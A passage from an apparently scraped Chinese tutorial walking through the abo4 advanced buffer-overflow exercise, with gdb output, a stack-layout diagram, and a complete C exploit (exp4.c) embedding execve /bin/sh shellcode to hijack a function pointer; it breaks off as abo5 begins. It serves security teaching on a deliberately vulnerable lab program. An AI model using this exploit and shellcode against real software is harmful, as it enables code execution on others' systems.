📄 467.html
字号:
0x080482e4-> 0x080482ec at 0x000002e4: . rel. dyn<br />
0x080482ec-> 0x0804832c at 0x000002ec: . rel. plt<br />
0x0804832c-> 0x08048351 at 0x0000032c: . init<br />
0x08048354-> 0x080483e4 at 0x00000354: . plt<br />
0x080483f0-> 0x0804859c at 0x000003f0: . text<br />
0x0804859c-> 0x080485b8 at 0x0000059c: . fini<br />
<br />
0x080485b8-> 0x080485c0 at 0x000005b8: . rodata<br />
0x080495c0-> 0x080495d0 at 0x000005c0: . data<br />
0x080495d0-> 0x08049618 at 0x000005d0: . eh_ frame<br />
0x08049618-> 0x080496e0 at 0x00000618: . dynamic<br />
0x080496e0-> 0x080496e8 at 0x000006e0: . ctors<br />
0x080496e8-> 0x080496f0 at 0x000006e8: . dtors<br />
0x080496f0-> 0x08049720 at 0x000006f0: . got<br />
0x08049720-> 0x08049738 at 0x00000720: . bss<br />
[ Some part of output was removed. It?ˉs not needed anyway]<br />
( gdb) x/ x 0x080495cc<br />
0x80495cc < force_ to_ data>: 0x08048384<br />
( gdb) x/ x 0x08048384<br />
0x8048384 < puts>: 0x970425ff<br />
( gdb)<br />
0x8048388 < puts+ 4>: 0x10680804<br />
( gdb)<br />
0x804838c < puts+ 8>: 0xe9000000<br />
( gdb) q<br />
The program is running. Exit anyway? ( y or n) y<br />
user@ CoreLabs:~/ gera$<br />
<br />
当程序被操作系统调入内存运行, 其相对应的进程在内存中的影像如下图所示.<br />
<br />
0xbfffffff ---> +--------------------------------------+<br />
| |<br />
+--------------------------------------+ <--<br />
| shellcode | |<br />
+--------------------------------------+ |<br />
| | |<br />
+--------------------------------------+ |<br />
--- | pbuf 的地址 | |<br />
| +--------------------------------------+ |<br />
| | Buf[256] | |<br />
| | | |<br />
| | AAAAAAAA | |<br />
| | AAAAAAAA | |<br />
栈(stack) | +--------------------------------------+ |<br />
增长方向 | | | |<br />
| |<br />
| |<br />
| | | |<br />
| +--------------------------------------+ |<br />
| | fu() | |<br />
--->+--------------------------------------+ ---<br />
| |<br />
/|\ +--------------------------------------+<br />
| | .fini |<br />
| +--------------------------------------+<br />
堆(heap)增长方向 | | .text |<br />
| +--------------------------------------+<br />
| | .plt |<br />
| +--------------------------------------+<br />
| |<br />
0x08000000---> +--------------------------------------+<br />
<br />
<br />
<br />
<br />
<br />
利用第一个strcpy()覆盖了指向pbuf(动态分配缓存区的)(它刚好在buf[256]前)的指针,这样攻击者就可以控制第二个strcpy(),拷贝第二个参数argc[2]中的数据到任何地方。一般他会选择覆盖函数fn()的地址0x080495cc,这里指向内存地址0x08048384处的puts(),攻击者可以在内存中修改让它指向shellcode。<br />
<br />
下面是相应的exploit:<br />
/*<br />
** exp4. c<br />
** Coded by CoreSecurity-info@core-sec.com<br />
*/<br />
<br />
# include <string.h><br />
# include <unistd.h><br />
<br />
# define BUFSIZE1 261<br />
# define BUFSIZE2 5<br />
# define FN_ADDRESS 0x080495cc /* Address of fn() */<br />
<br />
/* 24 bytes shellcode */<br />
char shellcode[]=<br />
"x31xc0x50x68x2fx2fx73x68x68x2fx62x69"<br />
"x6ex89xe3x50x53x89xe1x99xb0x0bxcdx80";<br />
<br />
int main(void) {<br />
<br />
char evil_buffer1[BUFSIZE1];<br />
char evil_buffer2[BUFSIZE2];<br />
char * env[3]=shellcode,NULL;<br />
char * p;<br />
<br />
/* Calculating address of shellcode */<br />
int ret=0xbffffffa-strlen(shellcode)-strlen("/home/user/gera/abo4");<br />
<br />
/* Constructing first buffer */<br />
p=evil_buffer1;<br />
memset(p,'A',256); // Some junk<br />
p +=256;<br />
<br />
*((void **)p) = (void *) (FN_ADDRESS);<br />
p +=4;<br />
* p ='0';<br />
<br />
/* Constructing second buffer */<br />
p=evil_buffer2;<br />
*((void **)p)=(void *)(ret);<br />
p += 4;<br />
* p ='0';<br />
<br />
execle("/home/gera/user/abo4","abo4",evil_buffer1,evil_buffer2,"A",NULL,env);<br />
}<br />
<br />
<br />
高级缓存区溢出代码5的分析<br />
源代码:<br />
<br />
/* abo5. c *<br />
* specially crafted to feed your brain by gera@core⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -